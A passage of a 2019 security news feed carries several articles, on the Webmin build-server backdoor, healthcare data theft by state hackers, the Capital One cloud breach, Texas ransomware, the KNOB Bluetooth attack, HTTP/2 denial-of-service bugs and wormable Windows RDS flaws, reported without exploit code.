“One theme FireEye has observed among Chinese cyber espionage actors targeting the healthcare sector is the theft of large sets of PII and PHI, most notably with several high-profile breaches of U.S. organizations in 2015,” FireEye said. “We assess that the theft of bulk data appears to remain a tactic employed by Chinese cyber espionage actors in targeting certain groups of individuals, as evidence by the breach of SingHealth in 2018.”

China isn’t the only country interested in medical data. At least two Russian APT groups and a Vietnam-based group have also targeted healthcare organizations or stolen related data. APT28 (“Fancy Bear” by CrowdStrike) attacked the World Anti-Doping Association (WADA), the global organization that handles testing Olympic athletes for use of banned drugs and supplements. Vietnam’s APT32 targeted a British health care organization, FireEye said in its report.

]]>
<![CDATA[Backdoor Found in Webmin Utility]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/backdoor-found-in-webmin-utility https://duo.com/decipher/backdoor-found-in-webmin-utility Tue, 20 Aug 2019 00:00:00 -0400

On August 17, the developer of the popular Webmin and Usermin Unix tools pushed out an update to fix a handful of security issues. Normally that wouldn’t generate an avalanche of interest, but in this case, one of those vulnerabilities was introduced intentionally by someone who was able to compromise the software build infrastructure used by the developers.

“Webmin version 1.890 was released with a backdoor that could allow anyone with knowledge of it to execute commands as root,” Jamie Cameron, the author of Webmin, wrote in an explanation of the incident.

Webmin is a systems-management user interface tool that’s widely used in Unix-based environments, and Usermin is a webmail client. On Saturday the developer released an emergency update for the tools to address several cross-site scripting vulnerabilities, as well as a serious remote-code execution flaw that the developers say was inserted into the codebase on purpose. The vulnerability only appears in the version of the code that was released on Sourceforge and not the version that was on GitHub. The backdoor was first introduced in version 1.890 and was also included in 1.900 and 1.920.

Cameron said that the Webmin build system was compromised sometime in April 2018 and the attacker was able to add the malicious code into the codebase. The attacker then rolled the timestamp on the build back to prevent anyone from noticing the new addition.

“It appears that a build/test system was compromised some time last year and the exploited added to code in the directory from which packages are built (and file timestamps modified to make this change not show up in a git diff),” Cameron said in an email.

“How the exploit happened is impossible to determine at this point, as the machine in question has been decommissioned. Unfortunately before this the directory was copied to a new build host, so a limited version of the exploit persisted into future versions.”

“How the exploit happened is impossible to determine at this point, as the machine in question has been decommissioned."

The vulnerability that the attacker added to the Webmin code is a subtle one that was present in default configurations in Webmin 1.890. If Webmin was configured to prompt users to change their passwords once they’ve expired, the vulnerability was present and could be exploited remotely. The modified code went unnoticed for several months.

“The vulnerable file was reverted to the checked-in version from Github, but sometime in July 2018 the file was modified again by the attacker. However, this time the exploit was added to code that is only executed if changing of expired passwords is enabled,” Cameron said in his explanation.

“On September 10th 2018, the vulnerable build server was decomissioned and replaced with a newly installed server running CentOS 7. However, the build directory containing the modified file was copied across from backups made on the original server.”

The updated versions are Webmin 1.930 and Usermin 1.780. An exploit for the Webmin vulnerability is available publicly, adding to the urgency to install the patched version. During the DEF CON conference earlier this month, details of the Webmin vulnerability became public and exploit code is easily available. Cameron and the Wenmin development team were only notified of the vulnerability on August 17 and then set about finding and removing the vulnerable code.

“Since the change wasn't made by me or any other developer, and was hidden via use of a tricky Perl operation that didn't make it clear that this could be used as an exploit,” he said in his email to Decipher.

]]>
<![CDATA[Hacking for Good: The Cult of the Dead Cow and the Rise of Hacker Culture]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/hacking-for-good-the-cult-of-the-dead-cow-and-the-rise-of-hacker-culture https://duo.com/decipher/hacking-for-good-the-cult-of-the-dead-cow-and-the-rise-of-hacker-culture Tue, 20 Aug 2019 00:00:00 -0400

The hacker culture that exists today can trace its origins to the hacker scenes of the 1980s and 1990s, when IRC was the place to be and tools and knowledge were currency. In those early years a variety of hacker crews formed around the world, including the Cult of the Dead Cow, which grew from a handful of friends in Texas into an enduring influence on the security industry and the culture at large.

During Black Hat USA 2019, cDc members Adam O'Donnell and Luke Benfey joined fellow hackers Dug Song, Katie Moussouris, and Heather Adkins for a discussion of the group's origins, the hacker mentality, and how hacker culture has become mainstream. Author and journalist Joseph Menn moderated the discussion.

]]>
<![CDATA[AWS Promises to Scan for Misconfigured Servers]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/aws-promises-to-scan-for-misconfigured-servers https://duo.com/decipher/aws-promises-to-scan-for-misconfigured-servers Mon, 19 Aug 2019 00:00:00 -0400

Like many recent data breaches, Capital One’s data breach was not the result of a vulnerability in Amazon’s cloud infrastructure, but rather how the financial giant had configured its systems. Even though Amazon Web Services wasn’t to blame, the company said that going forward, it will warn customers if it detects problems with how the customer had configured their systems and applications.

Amazon Web Services reiterated to Sen. Ron Wyden (D-Ore) that the attack succeeded because the attacker gained access through the misconfigured web application firewall and obtained broad-level permissions in response to his letter asking for clarification on how the attack unfolded. Specifically, Wyden wanted to know if there was a “server-side request forgery (SSRF) vulnerability” that was being exploited to trick misconfigured servers into revealing information.

“As Capital One outlined in their public announcement, the attack occurred due to a misconfiguration error at the application layer of a firewall installed by Capital One, exacerbated by permissions set by Capital One that were likely broader than intended,” wrote AWS CISO Stephen Schmidt. In the letter to Wyden, he wrote, “As discussed above, SSRF was not the primary factor in the attack.”

SSRF was one of several ways the attacker could have potentially gotten access to data once the attacker had gotten past the firewall and into the environment, Schmidt told Wyden.

As for how AWS makes sure customers are protecting their data, AWS provides “clear guidance on both the importance and necessity of protecting” systems from different attacks, including SSRF, Schmidt said. Customers have “documentation, how-to-guides, and professional services” to set up the web application firewall correctly. There is also “guidance and tools” to help customers set up the right level of permissions for different resources.

If the organization took a defense-in-depth approach and had multiple layers of protection “with intentional redundancies,” an attacker would not be able to get far enough to steal the data even after getting past the WAF, the letter said.

“Even if a customer misconfigures a resource, if the customer properly implements a ‘least privilege’ policy, there is relatively little an actor has access to once they are authenticated,” Schmidt said.

Misconfiguration is a Big Issue

One of the biggest misconceptions about moving application workloads to the cloud is that the service provider takes care of everything related to security. The reality is that both the cloud service provider and the organization have roles to play to keeps systems and data secure. When it comes to cloud infrastructure such as Amazon Web Services, Microsoft Azure, and Google Cloud, the service providers are responsible for the physical data centers and the server hardware the virtual machines run on. This is why the providers took the first pass at protecting their infrastructure from Meltdown and Spectre flaw, for example.

The organization, on the other hand, is responsible for protecting the virtual machines and the applications—by deploying the necessary controls, virtual appliances, and other security defenses. It is up to the organization to deploy a WAF, to encrypt the data, and restrict user-level permissions.

Some cloud providers make it easier to have those controls than others. While AWS has a comprehensive set of security tools, many of them are not available by default. Schmidt listed several AWS security services, including Macie, which automatically classifies data into buckets and then warns of anomalous attempts to access those buckets; and GuardDuty, which alerts when there are unusual Application Programming Interface (API) calls. “Well Architected Review” service inspects the customer’s technology architecture and give feedback on whether the customer is following best practices.

Most of these services—and many others—require administrators to consult the aforementioned documentation and guidance to deploy into their AWS environment. Some public cloud providers enable security controls by default for customers.

Providers Stepping In

Many recent cloud-based data breaches are the result of mistakes made by the organization, such as not restricting who can access Amazon Simple Storage Server (S3) buckets, or accidentally committing application tokens and credentials into public GitHub code repositories. In each of these instances, the providers aren’t at fault, but there have been so many of them in recent months that many service providers are beginning to act preemptively to detect those mistakes before they become incidents.

Schmidt told Wyden that AWS has started scanning public IP addresses to identify potentially problematic configurations. While it won’t be clear to AWS if the customer’s server is actually configured incorrectly, if something doesn’t look right, AWS will “err on the side of over-communicating” and warn the customer. AWS will “push harder” for customers to use Macie and GuardDuty, as well as “redoudle our efforts” to help customers set restricted permissions, Schmidt said.

What AWS is doing is similar to how GitHub and GitLab scans public code repositories to see if any secrets—application tokens, credentials, SSH private keys, or other sensitive information—were committed alongside the code. The repository providers alert the organizations who own those secrets to revoke them and warn the customer. For example, if someone accidentally committed the API key for AWS in to the code, the scanning service would notify Amazon so that the key could be revoked before it could be abused.

The cloud is secure, but if the organization doesn't know how to securely configure their networks, applications, and data, there is a problem. Organizations will benefit from better security in the cloud, but that presupposes they are taking care of their responsibilities. Providers are now providing some of that hand-holding to make sure the basics are taken care of.

]]>
<![CDATA[Coordinated Ransomware Attack Hits Texas Government Agencies]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/coordinated-ransomware-attack-hits-texas-government-agencies https://duo.com/decipher/coordinated-ransomware-attack-hits-texas-government-agencies Mon, 19 Aug 2019 00:00:00 -0400

More than 20 government agencies in Texas have been victimized in what looks to be a coordinated ransomware attack.

The attack took place over the weekend, and officials with the Texas Department of Information Resources said that most of the targeted agencies are smaller local government bureaus, though they have not identified which specific agencies have been hit. The officials also have not publicly disclosed which ransomware is involved in the incident or what the ransom demands are.

“On the morning of August 16, 2019, more than 20 entities in Texas reported a ransomware attack. The majority of these entities were smaller local governments. Later that morning, the State Operations Center (SOC) was activated with a day and night shift. At this time, the evidence gathered indicates the attacks came from one single threat actor. Investigations into the origin of this attack are ongoing; however, response and recovery are the priority at this time,” the DFIR said in a statement.

Ransomware began as mostly a consumer threat, with attackers infecting individual victims, encrypting their data and demanding a ransom in order to decrypt it. In the last couple of years, however, attackers have been targeting enterprises and government agencies in an effort to maximize the potential payout for their intrusions. There have been a number of large-scale ransomware attacks on city and state governments recently, most notably the crippling intrusion of the City of Baltimore’s infrastructure in May. The attackers demanded a $100,000 ransom, which city officials refused to pay, and instead began restoring systems from backups. That process is still ongoing and the city has estimated the attack has cost more than $18 million so far.

Other cities that have been targeted by ransomware have chose a different path. Two cities in Florida, Lake City and Riviera Beach, both opted to pay large ransoms in order to recover their data. Lake City paid about $500,000 and Riviera Beach paid nearly $600,000.

Baltimore’s network was hit the RobinnHood ransomware, but there are dozens of individual ransomware variants, most of which can be quite difficult to deal with. Security researchers have been successful in finding weaknesses or decryption methods for some ransomware, but there are many others that have no technical solution available. Law enforcement agencies typically advise victim organizations not to pay the ransom if they’re hit, but organizations without current backups sometimes don’t have other options.

The Texas DIR officials said 23 total agencies were compromised in the current attack, although it does not appear that the State of Texas network itself was hit with the ransomware.

]]>
<![CDATA[New Attack Exposes Serious Bluetooth Weakness]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/new-attack-exposes-serious-bluetooth-weakness https://duo.com/decipher/new-attack-exposes-serious-bluetooth-weakness Fri, 16 Aug 2019 00:00:00 -0400

The Bluetooth protocol has a fundamental weakness that can allow an attacker to intercept and decrypt supposedly secure communications, and the vulnerability affects virtually every device that has Bluetooth capabilities.

The vulnerability is in the method that Bluetooth devices use to negotiate the initial encryption key to secure communications between them. The Bluetooth specification states that the key must be between right and 128 bits in length and the process through which the two devices negotiate the key length is done in the clear with no authentication. A group of researchers developed a new attack called KNOB (Key Negotiation of Bluetooth) that can force two devices to use an 8-bit key, which can be brute-forced quite easily, allowing the adversary to listen in on any encrypted sessions between the devices without being detected. The weakness affects the Bluetooth firmware and the researchers tested their attack on a wide variety of chips from Broadcom, Intel, Apple, and Qualcomm, among others, all of which were vulnerable.

An attacker would simply need to be within Bluetooth range of the target devices to launch the KNOB attack.

“The KNOB attack can be conducted remotely or by maliciously modifying few bytes in one of the victim’s Bluetooth firmware. Being a standard-compliant attack it is expected to be effective on any firmware implementing the Bluetooth specification, regardless of the Bluetooth version. The at- tacker is not required to possess any (pre-shared) secret material and he does not have to observe the pairing process of the victims,” the paper says.

“The attack is effective even when the victims use the strongest security mode of Bluetooth (Secure Connections). The attack is stealthy because the application using Bluetooth and even the operating systems of the victims can- not access or control the encryption key negotiation protocol.”

The research team that developed the attack includes Daniele Antonelli of Singapore University of Technology and Design, Nils Ole Tippenhauer of CISPA Helmholtz Center for Information Security, and Kasper Rasmussen of the University of Oxford. The team presented the findings at the USENIX Security Symposium this week, and worked with the CERT/CC at Carnegie Mellon University to coordinate the disclosure with affected vendors.

For individual users, the attack as described by the researchers would be invisible and the best defense at this point is to turn off Bluetooth on affected devices. But that removes quite a bit of the functionality of many devices, especially phones. The Bluetooth Special INterest Group, which maintains the specification, has changed the specification to require a longer minimum key length.

“To remedy the vulnerability, the Bluetooth SIG has updated the Bluetooth Core Specification to recommend a minimum encryption key length of 7 octets for BR/EDR connections. The Bluetooth SIG will also include testing for this new recommendation within our Bluetooth Qualification Program. In addition, the Bluetooth SIG strongly recommends that product developers update existing solutions to enforce a minimum encryption key length of 7 octets for BR/EDR connections,” the statement says.

The KNOB attack is quite similar to a vulnerability that Google fixed in the Titan hardware security keys in May.

]]>
<![CDATA[Chrome and Firefox Removing EV Certificate Indicators]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/chrome-and-firefox-removing-ev-certificate-indicators https://duo.com/decipher/chrome-and-firefox-removing-ev-certificate-indicators Thu, 15 Aug 2019 00:00:00 -0400

Browser makers have been making a series of changes to the way they display security indicators to users, and in the next major versions of Chrome and Firefox, Google and Mozilla will remove the information about extended validation SSL certificates from the address bar after deciding that it doesn’t communicate any useful information to users.

For many years, browser vendors have struggled to find effective ways to communicate the relative security of a given site to users. Locks, open or closed or missing, stoplight colors, and various combinations thereof have all been tried, with varying degrees of success. In some cases, the indicators were too small or too vague, and in others they didn’t communicate the information they were meant to communicate. Google, Microsoft, Mozilla, and Apple all have tinkered with the icons in the browser address bar recently, specifically with the icon that indicates the status of a site’s certificate and therefore the visitor’s connection to it. Google is planning a major change to that in Chrome 77, removing the EV status information from the address bar altogether and moving it into a drop-down instead.

The reasoning behind the decision is that people apparently don’t pay much attention to the indicator and don’t miss it when it’s gone. Google’s internal research, as well as previous academic research, shows that when the EV certificate information is removed from the address bar, people will still enter sensitive information into a site, with no indication that it’s secure. Extended validation certificates require a higher level of proof of identity for organizations, including the physical presence of the site owner and exclusive control over the domain. But that information is not obvious to people visiting a site with an EV certificate.

“Through our own research as well as a survey of prior academic work, the Chrome Security UX team has determined that the EV UI does not protect users as intended (see Further Reading below). Users do not appear to make secure choices (such as not entering password or credit card information) when the UI is altered or removed, as would be necessary for EV UI to provide meaningful protection,” Google said.

“Further, the EV badge takes up valuable screen real estate, can present actively confusing company names in prominent UI, and interferes with Chrome's product direction towards neutral, rather than positive, display for secure connections. Because of these problems and its limited utility, we believe it belongs better in Page Info.”

Mozilla’s reasoning for making the change is similar. The company said users basically don’t notice the EV indicator and so it has no effective use in the address bar.

“In desktop Firefox 70, we intend to remove Extended Validation (EV) indicators from the identity block (the left hand side of the URL bar which is used to display security / privacy information). We will add additional EV information to the identity panel instead, effectively reducing the exposure of EV information to users while keeping it easily accessible,” Johann Hofmann of Mozilla said.

“The effectiveness of EV has been called into question numerous times over the last few years, there are serious doubts whether users notice the absence of positive security indicators and proof of concepts have been pitting EV against domains for phishing.”

Firefox 70 is scheduled for release in October and Chrome 77 will be available in early September.

]]>
<![CDATA[Proposal to Make HTTPS Certificate Expire Yearly Back on the Table]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/proposal-to-make-https-certificate-expire-yearly-back-on-the-table https://duo.com/decipher/proposal-to-make-https-certificate-expire-yearly-back-on-the-table Thu, 15 Aug 2019 00:00:00 -0400

An industry group of web browser makers and certificate authorities is considering a proposal to limit the lifespan of digital certificate certificates to just a little more than a year.

Google engineer Ryan Sleevi, submitted the proposal to the CA/Browser Forum, an industry group of certificate authorities, major browser makers, and software developers. The CAB Forum sets standards and policies over how security certificates are issued and used on the web, and how long a TLS (Transport Layer Security) certificate should be valid is a recurring topic. Sleevi’s proposal would shorten the maximum validity period to 13 months from the current 27 months. There’s nothing to stop CAs from issuing certificates with shorter validity periods—the idea is that certificates have to expire after a certain time.

TLS certificates are used to encrypt connections to websites and to ensure that someone else cannot tamper with the user sessions or eavesdrop on communications being sent to and from the site. The browser can tell a certificate is valid and can be trusted up until the expiration date—after that date, the browser will stop sending users to that site because it doesn’t know if the site can be trusted. It is the website owner’s responsibility to renew the certificates to ensure that users can keep getting to the site.

The latest proposal would shorten the validity period to 13 months from the current 27 months. It used to be eight years, before it was shortened to five years, and then three years. The forum voted to set the maximum validity period to 27 months in 2017, as a compromise decision because certificate authorities balked at a different proposal to slash the validity period from 39 months to 13 months. Sleevi tried to get a vote on 13 months earlier in the year but did not get traction then.

If the proposal gets enough votes, the measure will take effect March 2020.

In an ideal scenario, websites will always have certificates using the latest cryptography, and one way to ensure that is by making websites renew the certificates frequently. Short validity periods ensures that older, insecure algorithms aren’t hanging around the ecosystem for a long time. If a certificate gets stolen, that’s fine, too, since they would expire shortly. The downside of shorter validity periods is that websites have to renew certificates frequently.

From a security standpoint, this proposal makes a lot of sense, and is one of the reasons browser makers Google and Mozilla support shortening the lifespan of these certificates. If there is a policy change or cryptographic standards change, the browser makers don’t want to have to wait more than a year for all the existing certificates to expire. For example, if this change goes into effect March 1, 2020, browsers still have to trust certificates that were issued in February and January for the full two-year period. If the decision is made to switch to a stronger cryptographic algorithm than SHA-2 (SHA-256) in certificates (which will happen some day), browsers will have to wait more than two years under the current scheme for all the already issued certificates to expire. That is a long time for certificates using deprecated methods to be still trusted.

The “validity period of certificates represents the single greatest impediment towards improving the security of the Web PKI,” Sleevi has said in the past.

Digicert’s Timothy Hollebeek opposes the proposal, arguing the security benefits aren’t enough to offset the increased headaches for website owners who have to renew more often. "Rapidly reducing certificate lifetimes to one year, or even less, has significant costs to many companies which rely on digital certificates to protect their systems."

That argument makes sense on the surface, except free certificate authority Let's Encrypt issues 90-day certificates. Let's Encrypt currently has more than 100 million active certificates, and it is growing every day. If website owners can keep up with Let's Encrypt's short timespans, then they can keep up with 13-months from other CAs. Keeping up with frequent renewals is difficult if the organization is handling the process manually. Let's Encrypt customers don't have a problem with shorter validity periods because the CA provides an automated process that handles renewals. Most CAs don't, and most organizations have not automated their certificate management processes, either.

It sounds trite to keep insisting that security needs to be automated, but this is one of the situations where it really does. Organizations that have tens of thousands of certificates deployed across their network and websites (and more they may have missed or don't know about) spend weeks coordinating with different teams to get certificates renewerd and redeployed. CAs aren't wrong in arguing that many organizations aren't currently equipped to handle a rapid cycle of renewals.

“Certificate management continues to be a manual process for most businesses – a shortened lifespan means IT teams will have to invest 3X to manage rolling certificates, which produces a 3X outage and configuration misstep risk," said Keyfactor’s chief security officer Chris Hickman. "Our research shows that 71 percent of businesses don't even know how many certificates they have – leaving them ill-equipped to revoke and reissue at scale.”

But the answer shouldn't be keeping the validity period the same. Instead, the industry--browser makers, CAs, and developers--should be figuring out a way to make the process easier for website owners. Let's Encrypt is getting a lot of traction because it has software that handles renewals--tools that take away the manual effort will go a long way towards fixing this problem.

A shorter maximum lifetime makes it possible for browsers and organizations to adapt faster to changes in security. For individual end users, this policy doesn’t really matter. For website owners, this can be challenging, especially if they aren’t using Let’s Encrypt’s automated system. But from the perspective of the ecosystem, it impacts how quickly algorithms can be changed, or mistakes be rectified.

]]>
<![CDATA[Many HTTP/2 Servers Vulnerable to DoS Bugs]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/many-http-2-servers-vulnerable-to-dos-bugs https://duo.com/decipher/many-http-2-servers-vulnerable-to-dos-bugs Wed, 14 Aug 2019 00:00:00 -0400

The HTTP/2 server implementations from a long list of vendors, including Amazon, Apple, Microsoft, and Apache, are susceptible to several newly disclosed attacks that can exhaust the resources of a target server with minimal effort from an attacker.

The eight new vulnerabilities are similar in their effects, although they differ slightly in the details. Researchers from Netflix and Google discovered the vulnerabilities and worked with the CERT/CC at Carnegie Mellon University to notify vendors and help produce patches, some of which were published yesterday when the disclosures about the vulnerabilities were made public. All of the vulnerabilities are variations on denial-of-service conditions and none of them allow an attacker to execute arbitrary code or take any other malicious actions on vulnerable servers.

“These attack vectors allow a remote attacker to consume excessive system resources. Some are efficient enough that a single end-system could potentially cause havoc on multiple servers. Other attacks are less efficient; however, even less efficient attacks can open the door for DDoS attacks which are difficult to detect and block,” the vulnerability advisory from Netflix says.

“Many of the attack vectors we found (and which were fixed today) are variants on a theme: a malicious client asks the server to do something which generates a response, but the client refuses to read the response. This exercises the server’s queue management code. Depending on how the server handles its queues, the client can force it to consume excess memory and CPU while processing its requests.”

HTTP/2 is an update to the foundational HTTP protocol and is designed to provide faster and more efficient browsing. The protocol is supported by about 40 percent of the top 10 million sites, including Google, Twitter, Amazon, and YouTube. Those sites also support HTTP/1.1, the previous version of the protocol.

A quick mitigation for all of these attacks in cases where a patch is not available or can’t be applied right away is to disable HTTP/2 support. Attacks on these weaknesses are not highly complex or resource-intensive, so the bar for an adversary to take advantage of one of them is relatively low. For example, the so-called Data Dribble weakness (CVE-2019-9511), simply requires an attacker to ask for big chunks of data over multiple connections.

“The attacker requests a large amount of data from a specified resource over multiple streams. They manipulate window size and stream priority to force the server to queue the data in 1-byte chunks. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both, potentially leading to a denial of service,” the advisory says.

These weaknesses affect a number of sites, but also some of the larger content delivery networks and hosting providers. Engineers at Cloudflare were notified of the vulnerabilities a few weeks ago and set about patching affected servers immediately.

“As soon as we became aware of these vulnerabilities, Cloudflare’s Protocols team started working on fixing them. We first pushed a patch to detect any attack attempts and to see if any normal traffic would be affected by our mitigations. This was followed up with work to mitigate these vulnerabilities; we pushed the changes out few weeks ago and continue to monitor similar attacks on our stack,” Ahamed Nafeez of Cloudflare said in a post on the company’s response.

]]>
<![CDATA[Personality Types May Be Useful in Security Training]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/personality-types-may-be-useful-in-security-training https://duo.com/decipher/personality-types-may-be-useful-in-security-training Wed, 14 Aug 2019 00:00:00 -0400

Research suggests that people’s personality types can influence whether they would be more likely to fall for social engineering attacks or be less likely to click on phishing links. The combination of information security with business psychology is an intriguing area to explore, but it may unfairly put the burden of security on to the individual.

Different personality types have different strengths and weaknesses in how they understand—and deal with—cybersecurity, researchers from ESET and Myers-Briggs said in their Cyberchology report. People who focus more on the outside world tended to be more vulnerable to social engineering and people who observe and remember details are better at spotting risks, the study found.

Personality tests that claim to give people insights in how they perceive the world are easy to find, and many enterprises adopted the Myers-Briggs Type Indicator (MBTI) to figure out how to manage employees back in the 1980s. The practice still exists in many industry sectors as managers believe the MBTI helps them adjust team dynamics to create an effective workplace. Now the idea is that similar assessments can help organizations figure out what blindspots their employees may have regarding information security and to customize security training to strengthen those areas.

A self-reported questionnaire, MBTI organizes personality along four psychological features—sensation, intuition, feeling, and thinking—to create the four major categories: Introversion/Extraversion, Sensing/Intuition, Thinking/Feeling, and Judging/Perception. MBTI defines where people draw their energy, how they learn, how they make decisions, and whether they prefer a structured or open-ended approach. ESET and Myers-Briggs polled 520 people who had completed MBTI assessments in Europe for this study with questions about their jobs, security habits, phishing experiences, and overall security knowledge.

No personality type is “more secure” than others.

The researchers drew upon MBTI concepts when they looked at five personality types: “extraverted personality,” or those that focus on the outside world and work out ideas by talking them through; those that prefer to “sense,” as they observe and remember details; those that “feel,” as they are guided by personal values; those that “judge,” as they tend to be systematic and structured; and people with a preference for “thinking,” as they approach problems logically.

Let's get one thing straight: No personality type is “more secure” than others. As many things in information security, it’s complicated.

Security Strengths and Weaknesses

People with extraverted personalities “tend to be more vulnerable to manipulation, deceit, and persuasion from cybercriminals” but their being more aware of what is happening around them means they are “generally faster to pick up on attacks coming in from outside,” the researchers said.

Phishing attacks are less likely to be effective if the targeted person has a preference for sensing because that person is better with details, but that person may take more security risks. People with a preference for “thinking” tend to be very logical, so are more cautious and more rigorous about following security policies. However, this same group is more likely to overestimate their competencies, which leads to mistakes. They scored highly on security knowledge, but they were likely to think that the rules didn’t apply to them.

The value in understanding personality types seem to lie in changing how security is taught. Just as managers rely on the MBTI to adjust how they manage their employees and understand team dynamics to create the most effective working environment, researchers suggested that personality profiles can be used to customize security training. The training materials can be tailored to take into account employee personalities and behavioral preferences when explaining the role each person plays in securing company data. A common security training lesson is to have people scrutinize the email headers to make sure the addresses look legitimate. This is a skill that comes naturally to the thinking types, but may be harder on others.

Knowing what people respond to would be helpful in teaching people on what to be a bit more wary about. A phishing email that relies on facts or talks about a benefit (such as saving money) would be more effective on the people who fall on the objective and analytical side of the equation. The sensing and feeling types tend to be more trusting and loyal, so would be more vulnerable to a phishing email that appear to have been sent by an authority figure. The intuition and feeling types may be more likely to fall for a phishing email disguised as a charity request.

The last thing anyone needs is deciding that a certain type of personality profile is a “better” security employee for that company’s risk profile.

The challenge of relying too much on personality types is that it opens up a trap of explaining that an attack happened because of a person’s alignment. The last thing anyone needs is deciding that a certain type of personality profile is a “better” security employee for that company’s risk profile.

While customizing security training to recognize that some things are easier for some people than others is a useful idea, it’s important to realize that security awareness training is just one item in the security portfolio. There is a tendency to put the onus of security defense on the individual—if you click on the link, we will get breached. If you don’t follow this process, the data will be stolen—which is unfair on the individual. People will make mistakes and forget to do something. Even the savviest, most security-aware person will fall for a carefully-crafted phishing attack. This is where the bulk of enterprise defense lies: setting up automated systems that check that procedures have been followed or deploying technology to ensure the proper controls are in place.

Security training is important, but it is just one item. It can catch some attacks and it helps people identify their weaknesses so that they can adjust their behavior accordingly.

"Overlaying organization-wide self-awareness with a robust cyber security system can create a net of human/digital skills and proclivities which cybercriminals will have trouble slipping through," the researchers said.

Human Behavior and Security

Many organizations have been exploring the intersection of personality and security to figure out why people make decisions and take risks. Forcepoint X-Labs has has identified the personality traits as neuroticism, extraversion, openness, agreeableness, and conscientiousness. Forcepoint X-Labs recently examined how cognitive bias can also influence how people make security decisions.

It's not just security awareness training. A data protection officer at a major European airline has discussed how to use the idea of personality in a supply chain situation to assess a third-party provider's security risk.

Panorays earlier this year discussed how they look at the “employee attack likelihood,” or a score assigned on whether a person be targeted in an attack. Employees may be targeted because of their job titles or roles in certain departments because they have access to specific types of information or systems. While an executive may have access to sensitive information, an IT administrator would have extensive privileges. The score also takes into account the digital footprint and whether the person has had credentials leaked in other data breaches.

“The human factor is always the wild card when considering the cyber resilience of an organization,” said Matan Or-El, CEO and co-founder of Panorays.

]]>
<![CDATA[Two New BlueKeep-Like Flaws Emerge in Windows]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/two-new-bluekeep-like-flaws-emerge-in-windows https://duo.com/decipher/two-new-bluekeep-like-flaws-emerge-in-windows Tue, 13 Aug 2019 00:00:00 -0400

Microsoft is urging customers to patch a pair of critical vulnerabilities in Windows that were fixed today, both of which could be used to spawn a worm, like the BlueKeep vulnerability disclosed in May.

The two weaknesses affect all supported versions of Windows 10, along with Windows 7 SP1, Windows 8.1, Windows Server 2008 R2 SP1, Windows Server 2012, and Windows Server 2012 R2. Like the BlueKeep vulnerability, these two new bugs are in the Remote Desktop Services component in Windows and both are exploitable remotely without any authentication. Because of the pre-authentication exploitability and the fact that the bugs are in RDS, Microsoft researchers are worried about the potential of a worm emerging to exploit large numbers of vulnerable machines.

Microsoft discovered the flaws internally while reviewing the security of the RDS component.

“These vulnerabilities were discovered by Microsoft during hardening of Remote Desktop Services as part of our continual focus on strengthening the security of our products. At this time, we have no evidence that these vulnerabilities were known to any third party,” Simon Pope, director of incident response at the Microsoft Security Response Center, said.

“It is important that affected systems are patched as quickly as possible because of the elevated risks associated with wormable vulnerabilities like these.”

“It is important that affected systems are patched as quickly as possible because of the elevated risks associated with wormable vulnerabilities like these.”

RDS is the Windows implementation of the Remote Desktop Protocol and used to be known as Terminal Services in previous versions of Windows. In May, Microsoft released a patch for a similar vulnerability known as BlueKeep and even published fixes for older versions of Windows that were no longer supported because of concerns that a worm might emerge to take advantage of the flaw. In July, Immunity Inc. released an exploit for the BlueKeep vulnerability in its CANVAS penetration testing platform, heightening those concerns. However, so far no large-scale worms have appeared.

While it’s too soon to know how things will play out for these two new vulnerabilities, Pope said some systems are protected against the possibility of a worm exploiting the bugs.

“There is partial mitigation on affected systems that have Network Level Authentication (NLA) enabled. The affected systems are mitigated against ‘wormable’ malware or advanced malware threats that could exploit the vulnerability, as NLA requires authentication before the vulnerability can be triggered. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate,” Pope said.

]]>